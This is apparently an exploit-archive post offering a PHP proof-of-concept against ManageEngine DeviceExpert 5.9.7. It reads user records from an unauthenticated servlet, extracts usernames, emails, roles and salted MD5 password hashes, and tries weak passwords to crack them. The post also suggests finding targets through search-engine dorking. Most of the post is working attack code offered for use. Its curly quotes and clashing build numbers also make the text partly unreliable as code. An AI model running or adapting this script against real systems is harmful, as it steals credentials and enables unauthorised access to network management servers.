ManageEngine DeviceExpert 5.9.7 Build 5970 Hash Disclosure

====================================================================================================================================
| # Title : DeviceExpert v 5.9.7 build 5970 PHP extracts Credentials Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |
| # Vendor : https://manageengine.com/ |
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This PHP COde extracts usernames and salted MD5 password hashes from ManageEngine DeviceExpert version 5.9 build 5980 and prior.

[+] LIne 87 set your targer .

[+] usage : C:\www\test>php 3.php

[+] Payload :

<?php
class ManageEngineDeviceExpert {
private $host;
private $port;
private $ssl;

public function __construct($host, $port = 6060, $ssl = true) {
$this->host = $host;
$this->port = $port;
$this->ssl = $ssl;
}

private function sendRequest($path) {
$url = ($this->ssl ? ‘https://’ : ‘http://’) . $this->host . ‘:’ . $this->port . $path;
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
return $response;
}

public function getUsers() {
echo “Reading users from master…\n”;
$response = $this->sendRequest(‘/ReadUsersFromMasterServlet’);
if (!$response) {
echo “Connection failed\n”;
return null;
}
if (strpos($response, ‘<discoverydata>’) !== false) {
preg_match_all(‘/<discoverydata>(.*?)<\/discoverydata>/’, $response, $matches);
echo “Found ” . count($matches[0]) . ” users\n”;
return $matches[0];
} else {
echo “Could not find any users\n”;
return null;
}
}

public function parseUserData($user) {
if (!$user) return null;

preg_match(‘/<username>([^<]+)<\/username>/’, $user, $username);
preg_match(‘/<password>([^<]+)<\/password>/’, $user, $encoded_hash);
preg_match(‘/<userrole>([^<]+)<\/userrole>/’, $user, $role);
preg_match(‘/<emailid>([^<]+)<\/emailid>/’, $user, $email);
preg_match(‘/<saltvalue>([^<]+)<\/saltvalue>/’, $user, $salt);

$hash = base64_decode($encoded_hash[1]);
$password = null;

$weak_passwords = [‘12345’, ‘admin’, ‘password’, $username[1]];
foreach ($weak_passwords as $weak_password) {
if (md5($weak_password . $salt[1]) == bin2hex($hash)) {
$password = $weak_password;
break;
}
}

return [
‘username’ => $username[1],
‘password’ => $password,
‘hash’ => bin2hex($hash),
‘role’ => $role[1],
’email’ => $email[1],
‘salt’ => $salt[1]];
}

public function run() {
$users = $this->getUsers();
if (!$users) return;

foreach ($users as $user) {
$user_data = $this->parseUserData($user);
if (!$user_data) continue;

echo “User: ” . $user_data[‘username’] . “\n”;
echo “Password: ” . ($user_data[‘password’] ? $user_data[‘password’] : ‘Not found’) . “\n”;
echo “Hash: ” . $user_data[‘hash’] . “\n”;
echo “Role: ” . $user_data[‘role’] . “\n”;
echo “Email: ” . $user_data[’email’] . “\n”;
echo “Salt: ” . $user_data[‘salt’] . “\n”;
echo “—————————-\n”;
}
}
}

// استخدام الكلاس
$deviceExpert = new ManageEngineDeviceExpert(‘127.0.0.1’);
$deviceExpert->run();
?>

Greetings to :==================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |
================================================================